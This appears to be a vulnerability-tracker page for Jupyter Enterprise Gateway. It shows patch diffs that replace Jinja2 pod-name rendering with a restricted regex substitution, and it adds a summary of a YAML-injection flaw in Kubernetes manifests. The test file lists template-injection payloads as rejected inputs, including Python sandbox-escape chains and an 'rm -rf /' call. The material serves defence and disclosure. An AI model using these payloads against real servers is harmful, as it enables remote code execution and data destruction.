         "SPARK_OPTS": "--master spark://127.0.0.1:7077  --name ${KERNEL_ID:-ERROR__NO__KERNEL_ID}",
         "LAUNCH_OPTS": ""
       },
    
  • docs/source/operators/deploy-yarn-cluster.md+2 2 modified
    @@ -103,8 +103,8 @@ After installing the kernel specifications, you should have a `kernel.json` that
       "env": {
         "SPARK_HOME": "/usr/hdp/current/spark2-client",
         "PYSPARK_PYTHON": "/opt/conda/bin/python",
    -    "PYTHONPATH": "${HOME}/.local/lib/python3.6/site-packages:/usr/hdp/current/spark2-client/python:/usr/hdp/current/spark2-client/python/lib/py4j-0.10.6-src.zip",
    -    "SPARK_YARN_USER_ENV": "PYTHONUSERBASE=/home/yarn/.local,PYTHONPATH=${HOME}/.local/lib/python3.6/site-packages:/usr/hdp/current/spark2-client/python:/usr/hdp/current/spark2-client/python/lib/py4j-0.10.6-src.zip,PATH=/opt/conda/bin:$PATH",
    +    "PYTHONPATH": "${HOME}/.local/lib/python3.10/site-packages:/usr/hdp/current/spark2-client/python:/usr/hdp/current/spark2-client/python/lib/py4j-0.10.6-src.zip",
    +    "SPARK_YARN_USER_ENV": "PYTHONUSERBASE=/home/yarn/.local,PYTHONPATH=${HOME}/.local/lib/python3.10/site-packages:/usr/hdp/current/spark2-client/python:/usr/hdp/current/spark2-client/python/lib/py4j-0.10.6-src.zip,PATH=/opt/conda/bin:$PATH",
         "SPARK_OPTS": "--master yarn --deploy-mode cluster --name ${KERNEL_ID:-ERROR__NO__KERNEL_ID} --conf spark.yarn.submit.waitAppCompletion=false",
         "LAUNCH_OPTS": ""
       },
    
  • docs/source/operators/installing-eg.md+10 1 modified
    @@ -7,7 +7,7 @@ packages for scientific computing and data science.
     Use the following installation steps:
     
     - Download [Anaconda](https://www.anaconda.com/download). We recommend downloading Anaconda's
    -  latest Python version (currently Python 3.11).
    +  latest Python version (currently Python 3.11+).
     
     - Install the version of Anaconda which you downloaded, following the instructions on the download page.
     
    @@ -18,6 +18,15 @@ Use the following installation steps:
     Enterprise Gateway is currently incompatible with `jupyter_client >= 7.0`.  As a result, you should **not** install Enterprise Gateway into the same Python environment in which you intend to run Jupyter Notebook or Jupyter Lab since they will likely be using `jupyter_client >= 7.0`.  Since Enterprise Gateway is tupically installed on servers remote from the notebook users, this is usually not an issue.
     ```
     
    +```{note}
    +**Known Dependency Constraints:** Enterprise Gateway pins several key dependencies:
    +- `jupyter_client < 7` -- Enterprise Gateway's process proxy mechanism is incompatible with the kernel provisioner framework introduced in jupyter_client 7.x. This cap will be removed when EG adopts kernel provisioners (targeted for 4.0).
    +- `jupyter_server < 2.0` -- For the same kernel provisioner compatibility reason.
    +- `pyzmq < 25.0` -- pyzmq 25 removed deprecated APIs that jupyter_client 6.x still relies on.
    +
    +These constraints mean EG should be installed in a dedicated Python environment separate from notebook/lab installations that use newer versions of these packages.
    +```
    +
     ```bash
     # install using pip from pypi
     pip install --upgrade jupyter_enterprise_gateway
    
  • docs/source/users/kernel-envs.md+26 6 modified
    @@ -76,12 +76,15 @@ There are several supported `KERNEL_` variables that the Enterprise Gateway serv
         it is the user's responsibility that KERNEL_POD_NAME is unique relative to
         any pods in the target namespace.  In addition, the pod must NOT exist -
         unlike the case if KERNEL_NAMESPACE is provided. The KERNEL_POD_NAME can
    -    also be provided as a jinja2 template formatted string
    -    (e.g "{{ kernel_prefix }}-{{ kernel_id | replace('-', '') }}")
    -    which will be processed for safe substitution against existing list
    -    of environment variables. In case of invalid template (e.g. missing variables)
    -    it will fall back to original way to calculate the pod name using
    -    KERNEL_USERNAME - KERNEL_ID.
    +    also be provided as a template string using simple variable substitution
    +    (e.g. "{{ kernel_username }}-{{ kernel_id }}"). Only simple
    +    {{ variable_name }} references are supported -- Jinja2 filters and
    +    expressions are NOT supported and will be rejected for security reasons.
    +    Available variables include all KERNEL_* environment variables (lowercased,
    +    e.g. kernel_username, kernel_namespace) plus kernel_id. Variable names
    +    must start with a letter and contain only letters, digits, and underscores.
    +    In case of invalid template syntax or missing variables, Enterprise Gateway
    +    will fall back to the default pod name using KERNEL_USERNAME-KERNEL_ID.
     
       KERNEL_REMOTE_HOST=<remote host name>
         DistributedProcessProxy only.  When specified, this value will override the
    @@ -116,6 +119,23 @@ There are several supported `KERNEL_` variables that the Enterprise Gateway serv
         should be submitted in the request. In environments in which impersonation is
         used it represents the target of the impersonation.
     
    +  KERNEL_VOLUMES=<from user> or None
    +    Kubernetes and Spark Operator only. A JSON-formatted string defining
    +    Kubernetes volume specifications to mount into the kernel pod. The value
    +    is parsed via yaml.safe_load and passed to the kernel pod or
    +    SparkApplication template as the kernel_volumes variable. Example:
    +    KERNEL_VOLUMES='[{"name": "my-vol", "persistentVolumeClaim": {"claimName": "my-pvc"}}]'
    +    See the kernel-pod.yaml.j2 and sparkoperator templates for how volumes
    +    are rendered.
    +
    +  KERNEL_VOLUME_MOUNTS=<from user> or None
    +    Kubernetes and Spark Operator only. A JSON-formatted string defining
    +    Kubernetes volumeMount specifications for the kernel container. The value
    +    is parsed via yaml.safe_load and passed to the kernel pod or
    +    SparkApplication template as the kernel_volume_mounts variable. Example:
    +    KERNEL_VOLUME_MOUNTS='[{"name": "my-vol", "mountPath": "/data"}]'
    +    Must correspond to volumes defined via KERNEL_VOLUMES.
    +
       KERNEL_WORKING_DIR=<from user> or None
         Containers only.  This value should model the directory in which the active
         notebook file is running.   It is intended to be used in conjunction with appropriate volume
    
1e6b2f354976

Fix KERNEL_POD_NAME substitution to avoid SSTI (#1412)

https://github.com/jupyter-server/enterprise_gatewayLuciano ResendeAug 9, 2025Fixed in 3.3.0via ghsa-release-walk
4 files changed · +287 9
  • docs/source/users/kernel-envs.md+5 2 modified
    @@ -76,9 +76,12 @@ There are several supported `KERNEL_` variables that the Enterprise Gateway serv
         it is the user's responsibility that KERNEL_POD_NAME is unique relative to
         any pods in the target namespace.  In addition, the pod must NOT exist -
         unlike the case if KERNEL_NAMESPACE is provided. The KERNEL_POD_NAME can
    -    also be provided as a jinja2 template string
    +    also be provided as a jinja2 template formatted string
         (e.g "{{ kernel_prefix }}-{{ kernel_id | replace('-', '') }}")
    -    which will be evaluated against existing list of environment variables.
    +    which will be processed for safe substitution against existing list
    +    of environment variables. In case of invalid template (e.g. missing variables)
    +    it will fall back to original way to calculate the pod name using
    +    KERNEL_USERNAME - KERNEL_ID.
     
       KERNEL_REMOTE_HOST=<remote host name>
         DistributedProcessProxy only.  When specified, this value will override the
    
  • enterprise_gateway/services/processproxies/k8s.py+50 6 modified
    @@ -11,7 +11,6 @@
     from typing import Any
     
     import urllib3
    -from jinja2 import BaseLoader, Environment
     from kubernetes import client, config
     
     from ..kernels.remotemanager import RemoteKernelManager
    @@ -216,6 +215,42 @@ def terminate_container_resources(self) -> bool | None:
     
             return result
     
    +    def _safe_template_substitute(self, template_str: str, variables: dict) -> str | None:
    +        """
    +        Safely substitute variables in Jinja2-style template syntax.
    +        Only supports simple variable substitution: {{ variable_name }}
    +        Logs missing variables and returns None if any are missing.
    +        """
    +        # Pattern to match {{ variable_name }} with optional whitespace
    +        # Explicitly exclude variables starting with underscore to prevent magic method attacks
    +        pattern = r'\{\{\s*([a-zA-Z][a-zA-Z0-9_]*)\s*\}\}'
    +        missing_vars = []
    +
    +        def replace_var(match):
    +            var_name = match.group(1)
    +            if var_name in variables:
    +                return str(variables[var_name])
    +            else:
    +                missing_vars.append(var_name)
    +                return match.group(0)  # Keep original placeholder
    +
    +        result = re.sub(pattern, replace_var, template_str)
    +
    +        # Check if there are any remaining {{ }} patterns that didn't match our simple pattern
    +        # This catches malicious templates like {{ foo.__class__ }} or {{ 1+1 }}
    +        if '{{' in result and '}}' in result:
    +            self.log.warning(
    +                "Invalid template syntax detected in KERNEL_POD_NAME: contains unsupported expressions"
    +            )
    +            return None
    +
    +        # Log missing variables and return None if any are missing
    +        if missing_vars:
    +            self.log.warning(f"Template variables not found in KERNEL_POD_NAME: {missing_vars}")
    +            return None  # Signal caller to use default
    +
    +        return result
    +
         def _determine_kernel_pod_name(self, **kwargs: dict[str, Any] | None) -> str:
             pod_name = kwargs["env"].get("KERNEL_POD_NAME")
     
    @@ -224,16 +259,25 @@ def _determine_kernel_pod_name(self, **kwargs: dict[str, Any] | None) -> str:
             else:
                 self.log.debug(f"Processing KERNEL_POD_NAME based on env var => {pod_name}")
                 if "{{" in pod_name and "}}" in pod_name:
    -                self.log.debug("Processing KERNEL_POD_NAME as jinja template")
    -                # Create Jinja2 environment
    +                self.log.debug("Processing KERNEL_POD_NAME template variables")
                     keywords = {}
                     for name, value in kwargs["env"].items():
                         if name.startswith("KERNEL_"):
                             keywords[name.lower()] = value
                     keywords["kernel_id"] = self.kernel_id
    -                self.log.debug("Processing pod_name jinja template")
    -                env = Environment(loader=BaseLoader(), autoescape=True)
    -                pod_name = env.from_string(pod_name).render(**keywords)
    +
    +                # Safe template substitution with fallback
    +                substituted = self._safe_template_substitute(pod_name, keywords)
    +                if substituted is None:
    +                    # Fall back to default if template variables are missing
    +                    self.log.warning(
    +                        "Falling back to default pod name due to missing template variables"
    +                    )
    +                    pod_name = (
    +                        KernelSessionManager.get_kernel_username(**kwargs) + "-" + self.kernel_id
    +                    )
    +                else:
    +                    pod_name = substituted
     
             # Rewrite pod_name to be compatible with DNS name convention
             # And put back into env since kernel needs this
    
  • enterprise_gateway/tests/test_process_proxy.py+231 0 added
    @@ -0,0 +1,231 @@
    +# Copyright (c) Jupyter Development Team.
    +# Distributed under the terms of the Modified BSD License.
    +"""Tests for Kubernetes process proxy security fixes."""
    +
    +import unittest
    +from unittest.mock import Mock, patch
    +
    +# Mock Kubernetes configuration before importing the module
    +with patch('kubernetes.config.load_incluster_config'), patch('kubernetes.config.load_kube_config'):
    +    from enterprise_gateway.services.processproxies.k8s import KubernetesProcessProxy
    +
    +
    +class TestKubernetesProcessProxy(unittest.TestCase):
    +    """Test secure template substitution in Kubernetes process proxy."""
    +
    +    def setUp(self):
    +        """Set up test fixtures."""
    +        self.mock_kernel_manager = Mock()
    +        self.mock_kernel_manager.get_kernel_username.return_value = "testuser"
    +        self.mock_kernel_manager.port_range = "0..0"  # Mock port range
    +
    +        # Mock proxy config
    +        self.proxy_config = {"kernel_id": "test-kernel-id", "kernel_name": "python3"}
    +
    +        # Mock KernelSessionManager methods
    +        with patch(
    +            'enterprise_gateway.services.processproxies.k8s.KernelSessionManager'
    +        ) as mock_session_manager:
    +            mock_session_manager.get_kernel_username.return_value = "testuser"
    +            self.proxy = KubernetesProcessProxy(self.mock_kernel_manager, self.proxy_config)
    +            self.proxy.kernel_id = "test-kernel-id"
    +
    +    def test_valid_template_substitution(self):
    +        """Test valid template variable substitution."""
    +        test_cases = [
    +            # Basic variable substitution
    +            ("{{ kernel_id }}", {"kernel_id": "test-123"}, "test-123"),
    +            # Multiple variables
    +            (
    +                "{{ kernel_namespace }}-{{ kernel_id }}",
    +                {"kernel_namespace": "default", "kernel_id": "test-123"},
    +                "default-test-123",
    +            ),
    +            # Variables with underscores
    +            ("{{ kernel_image_pull_policy }}", {"kernel_image_pull_policy": "Always"}, "Always"),
    +            # Whitespace handling
    +            ("{{   kernel_id   }}", {"kernel_id": "test-123"}, "test-123"),
    +        ]
    +
    +        for template, variables, expected in test_cases:
    +            with self.subTest(template=template):
    +                result = self.proxy._safe_template_substitute(template, variables)
    +                self.assertEqual(result, expected)
    +
    +    def test_missing_variables_fallback(self):
    +        # Test the full pod name determination process
    +        kwargs = {
    +            "env": {
    +                "KERNEL_POD_NAME": "{{ missing_var }}",
    +                "KERNEL_NAMESPACE": "production",
    +            }
    +        }
    +
    +        with patch.object(self.proxy, 'log'), patch(
    +            'enterprise_gateway.services.processproxies.k8s.KernelSessionManager'
    +        ) as mock_session_manager:
    +            mock_session_manager.get_kernel_username.return_value = "testuser"
    +            result = self.proxy._determine_kernel_pod_name(**kwargs)
    +            # Should fall back to default naming: kernel_username + "-" + kernel_id
    +            self.assertEqual(result, "testuser-test-kernel-id")
    +
    +    def test_malicious_template_injection_prevention(self):
    +        """Test prevention of malicious template injection attacks."""
    +        malicious_templates = [
    +            # Python code execution attempts
    +            "{{ ''.__class__.__mro__[1].__subclasses__()[104].__init__.__globals__['sys'].exit() }}",
    +            "{{ __import__('os').system('rm -rf /') }}",
    +            "{{ exec('print(\"pwned\")') }}",
    +            "{{ eval('1+1') }}",
    +            # Attribute access attempts
    +            "{{ kernel_id.__class__ }}",
    +            "{{ kernel_id.__dict__ }}",
    +            "{{ kernel_id.__globals__ }}",
    +            # Function calls
    +            "{{ range(10) }}",
    +            "{{ len(kernel_id) }}",
    +            "{{ str.upper(kernel_id) }}",
    +            # Jinja2 filters and expressions
    +            "{{ kernel_id|upper }}",
    +            "{{ kernel_id + '_suffix' }}",
    +            "{{ 1 + 1 }}",
    +            # Complex expressions
    +            "{{ kernel_id if kernel_id else 'default' }}",
    +            "{{ kernel_id[:5] }}",
    +        ]
    +
    +        variables = {"kernel_id": "test-123"}
    +
    +        for malicious_template in malicious_templates:
    +            with self.subTest(template=malicious_template), patch.object(
    +                self.proxy, 'log'
    +            ) as mock_log:
    +                result = self.proxy._safe_template_substitute(malicious_template, variables)
    +                # All malicious templates should be treated as invalid and return None
    +                self.assertIsNone(result)
    +                mock_log.warning.assert_called_once()
    +                # Should warn about unsupported expressions
    +                self.assertIn("Invalid template syntax", mock_log.warning.call_args[0][0])
    +
    +    def test_pod_name_determination_with_templates(self):
    +        """Test complete pod name determination with template processing."""
    +        kwargs = {
    +            "env": {
    +                "KERNEL_POD_NAME": "{{ kernel_namespace }}-{{ kernel_id }}",
    +                "KERNEL_NAMESPACE": "production",
    +                "KERNEL_IMAGE": "python:3.9",
    +            }
    +        }
    +
    +        with patch.object(self.proxy, 'log'):
    +            result = self.proxy._determine_kernel_pod_name(**kwargs)
    +            # Should get processed and DNS-normalized
    +            self.assertEqual(result, "production-test-kernel-id")
    +
    +    def test_pod_name_determination_with_malicious_template(self):
    +        """Test pod name determination with malicious template falls back to default."""
    +        kwargs = {
    +            "env": {
    +                "KERNEL_POD_NAME": "{{ __import__('os').system('evil') }}",
    +                "KERNEL_NAMESPACE": "production",
    +            }
    +        }
    +
    +        with patch.object(self.proxy, 'log'), patch(
    +            'enterprise_gateway.services.processproxies.k8s.KernelSessionManager'
    +        ) as mock_session_manager:
    +            mock_session_manager.get_kernel_username.return_value = "testuser"
    +            result = self.proxy._determine_kernel_pod_name(**kwargs)
    +            # Should fall back to default naming
    +            self.assertEqual(result, "testuser-test-kernel-id")
    +
    +    def test_pod_name_determination_with_missing_variables(self):
    +        """Test pod name determination with missing variables falls back to default."""
    +        kwargs = {
    +            "env": {
    +                "KERNEL_POD_NAME": "{{ missing_var }}-{{ kernel_id }}",
    +                "KERNEL_NAMESPACE": "production",
    +            }
    +        }
    +
    +        with patch.object(self.proxy, 'log'), patch(
    +            'enterprise_gateway.services.processproxies.k8s.KernelSessionManager'
    +        ) as mock_session_manager:
    +            mock_session_manager.get_kernel_username.return_value = "testuser"
    +            result = self.proxy._determine_kernel_pod_name(**kwargs)
    +            # Should fall back to default naming
    +            self.assertEqual(result, "testuser-test-kernel-id")
    +
    +    def test_pod_name_without_template(self):
    +        """Test pod name determination without template syntax."""
    +        kwargs = {"env": {"KERNEL_POD_NAME": "static-pod-name", "KERNEL_NAMESPACE": "production"}}
    +
    +        with patch.object(self.proxy, 'log'):
    +            result = self.proxy._determine_kernel_pod_name(**kwargs)
    +            # Should use as-is and DNS-normalize
    +            self.assertEqual(result, "static-pod-name")
    +
    +    def test_pod_name_dns_normalization(self):
    +        """Test DNS name normalization of pod names."""
    +        kwargs = {
    +            "env": {
    +                "KERNEL_POD_NAME": "{{ kernel_namespace }}_{{ kernel_id }}",
    +                "KERNEL_NAMESPACE": "Test-Namespace",
    +                "KERNEL_IMAGE": "python:3.9",
    +            }
    +        }
    +
    +        with patch.object(self.proxy, 'log'):
    +            result = self.proxy._determine_kernel_pod_name(**kwargs)
    +            # Should be DNS-normalized (lowercase, dashes only)
    +            self.assertEqual(result, "test-namespace-test-kernel-id")
    +
    +    def test_regex_pattern_validation(self):
    +        """Test that only valid variable names are matched by regex."""
    +        valid_vars = [
    +            "kernel_id",
    +            "kernel_namespace",
    +            "kernel_image_pull_policy",
    +            "a",
    +            "var123",
    +            "KERNEL_ID",
    +        ]
    +
    +        # Variables that should be blocked by the regex pattern
    +        invalid_vars = [
    +            "123invalid",  # starts with number
    +            "invalid-var",  # contains dash
    +            "invalid.var",  # contains dot
    +            "invalid var",  # contains space
    +            "invalid@var",  # contains special char
    +            "_private_var",  # starts with underscore (security risk)
    +            "__class__",  # magic method (security risk)
    +            "__dict__",  # magic method (security risk)
    +            "__globals__",  # magic method (security risk)
    +        ]
    +
    +        variables = {var: "value" for var in valid_vars}
    +        # Also add underscore variables to test they're not substituted even if present
    +        variables.update(
    +            {"_private_var": "private", "__class__": "dangerous", "__dict__": "dangerous"}
    +        )
    +
    +        # Valid variables should be substituted
    +        for var in valid_vars:
    +            template = f"{{{{ {var} }}}}"
    +            result = self.proxy._safe_template_substitute(template, variables)
    +            self.assertEqual(result, "value", f"Valid variable {var} should be substituted")
    +
    +        # Invalid variables should be treated as having invalid syntax
    +        for var in invalid_vars:
    +            template = f"{{{{ {var} }}}}"
    +            with patch.object(self.proxy, 'log') as mock_log:
    +                result = self.proxy._safe_template_substitute(template, variables)
    +                self.assertIsNone(result, f"Invalid variable {var} should be rejected")
    +                mock_log.warning.assert_called_once()
    +                # Should warn about unsupported expressions since invalid var names don't match regex
    +                self.assertIn("Invalid template syntax", mock_log.warning.call_args[0][0])
    +
    +
    +if __name__ == '__main__':
    +    unittest.main()
    
  • Makefile+1 1 modified
    @@ -67,7 +67,7 @@ clean-env: ## Remove conda env
     lint: ## Check code style
     	@pip install -q -e ".[lint]"
     	@pip install -q pipx
    -	ruff .
    +	ruff check .
     	black --check --diff --color .
     	mdformat --check *.md
     	pipx run 'validate-pyproject[all]' pyproject.toml
    

Vulnerability mechanics

Root cause

"Environment variables are interpolated into Kubernetes manifests without proper YAML escaping, allowing injection of malicious YAML."

Attack vector

An attacker can send a crafted API request to the `/api/kernels` endpoint, providing malicious content within environment variables such as `KERNEL_WORKING_DIR` [ref_id=1]. These variables are then interpolated into the Kubernetes manifest template without YAML-aware escaping. This allows the injection of YAML syntax, including duplicate keys to overwrite existing fields like `securityContext` or document separators (`---`, `...`) to create additional Kubernetes resources [ref_id=1, ref_id=2].

Affected code

The vulnerability lies in the interpolation of environment variables into Kubernetes manifests via Jinja2 templates. Specifically, the `launch_kubernetes.py` script at lines 130-137 unsafely uses `yaml.safe_load()` on environment variables before rendering the `kernel-pod.yaml.j2` template [ref_id=1, ref_id=2]. The `enterprise_gateway/services/processproxies/k8s.py` file also contained unsafe template substitution logic.

What the fix does

The patch introduces multiple layers of defense. Firstly, it replaces `yaml.safe_load()` with raw string usage for most environment variables, preventing YAML parsing of untrusted input. Secondly, a `yaml_safe` Jinja2 filter is added to properly escape YAML scalars. Finally, post-render validation checks ensure that the rendered manifests only contain expected resource kinds and do not exceed the allowed document count [patch_id=4715605].

Preconditions

  • networkThe attacker must be able to send requests to the `/api/kernels` endpoint.
  • inputThe attacker must be able to control the content of environment variables passed in the API request.

Generated on Jun 3, 2026. Inputs: CWE entries + fix-commit diffs from this CVE's patches. Citations validated against bundle.

References

2

News mentions

0

No linked articles in our index yet.